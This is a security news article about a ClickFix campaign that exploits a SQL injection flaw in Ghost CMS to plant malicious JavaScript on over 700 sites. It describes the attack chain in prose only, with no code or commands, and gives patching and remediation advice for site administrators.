Ghost CMS SQL Injection Flaw Hits 700+ Sites in ClickFix Attack

Key Takeaways

• Over 700 domains compromised, including Harvard, Oxford, and DuckDuckGo
• Attackers steal admin API keys via SQLi, then inject malicious JavaScript into articles
• Ghost CMS 6.19.1 fixes the flaw, but many sites remain unpatched three months later

What's Happening

A large-scale attack campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to compromise legitimate websites and turn them into malware distribution platforms. Security researchers at XLab, the threat intelligence arm of Chinese cybersecurity firm Qianxin, have confirmed the attack has hit more than 700 domains.

The victims include university portals, AI and SaaS companies, media outlets, fintech firms, security websites, and personal blogs. Harvard University, Oxford University, Auburn University, and privacy-focused search engine DuckDuckGo are among the confirmed targets.

The vulnerability, tracked as CVE-2026-26980, carries a CVSS severity score of 9.4 out of 10. It affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from a website's database, including admin API keys.

How the Attack Works

The attack unfolds in two distinct stages. First, attackers exploit the SQL injection flaw to extract admin API keys from the Ghost database. These keys grant full management access to users, articles, and themes.

With admin privileges secured, attackers inject malicious JavaScript into existing articles. The script acts as a lightweight loader that fetches second-stage code from attacker-controlled infrastructure. This code fingerprints visitors to identify high-value targets.

Visitors who pass the verification check see a fake Cloudflare prompt loaded via an iframe on top of the article page. This is the ClickFix lure. The page instructs victims to verify they're human by pasting a provided command into their Windows command prompt. That command downloads malware to their system.

XLab observed multiple payloads in use: DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Why ClickFix Is Effective

The ClickFix technique bypasses traditional browser-based sandbox protections by tricking users into manually executing malicious shell commands. Unlike drive-by downloads or browser exploits, this approach relies on social engineering. The victim does the attacker's work for them.

Discussions on Reddit's r/cybersecurity community highlight growing concern about this trend. Users note that clipboard-hijacking techniques are becoming harder for non-technical people to detect. When a trusted website tells you to paste something into your terminal, many people comply without questioning it.

“The simplicity of the attack is its deadliest feature; by exploiting a single injection point, they effectively turn the host platform against its own audience.”

— Senior Security Analyst, Independent Threat Intelligence Firm

Multiple Threat Actors Involved

XLab researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites. In some cases, one group would clean up another's malicious script only to inject their own. Some domains were re-infected multiple times with different payloads after cleanup attempts.

This pattern suggests the vulnerability is being actively shared or sold in underground markets. When multiple threat actors compete to compromise the same targets, it indicates a vulnerability with proven value.

The Patch Gap Problem

Ghost released a fix for CVE-2026-26980 on February 19, 2026, in version 6.19.1. SentinelOne published detection guidance on February 27. Yet more than three months later, hundreds of sites remain vulnerable.

This gap between patch availability and patch adoption is a persistent problem in web security. Ghost CMS is popular with independent publishers, academic institutions, and small teams who may lack dedicated security staff. Automatic updates aren't always enabled, and security advisories don't always reach the right people.

What Ghost CMS Administrators Should Do Now

If you run a Ghost CMS site, the priority is immediate. Upgrade to version 6.19.1 or later. But patching alone isn't enough.

1. Update Ghost CMS to version 6.19.1 or newer immediately
2. Rotate all admin API keys, as they may have been stolen before you patched
3. Review all published articles for injected JavaScript, especially in page headers and footers
4. Check XLab's published indicators of compromise against your site's code
5. Enable admin API call logging and maintain at least 30 days of records for forensic analysis

XLab has released a list of indicators of compromise, including specific injected script signatures. A thorough code review is necessary to locate and remove any malicious additions.

Broader Implications

Ghost CMS is an open-source publishing platform used by academic institutions, media outlets, and independent bloggers. Its user base skews toward organizations that prioritize content over infrastructure management.

This campaign demonstrates how attackers can weaponize trusted platforms. A reader visiting Harvard's blog or DuckDuckGo's content has no reason to suspect the site itself is compromised. That trust becomes the attack vector.

Frequently Asked Questions

What is CVE-2026-26980?

It's a critical SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0 that allows unauthenticated attackers to extract sensitive data from the website database, including admin API keys.

How do I know if my Ghost site was compromised?

Check your published articles for unfamiliar JavaScript code, especially in headers and footers. Review XLab's published indicators of compromise and examine your admin API call logs for suspicious activity.

What is a ClickFix attack?

ClickFix is a social engineering technique where attackers display fake verification prompts that trick users into pasting malicious commands into their system terminal, bypassing browser security protections.

Is Ghost CMS still safe to use?

Yes, but only if you're running version 6.19.1 or later. The vulnerability has been patched. The ongoing attacks target sites that haven't applied the update.

Why are universities being targeted?

University websites have high domain authority and visitor trust. Compromising them gives attackers access to a large, educated audience who may be more likely to follow technical-looking instructions.

Source: BleepingComputer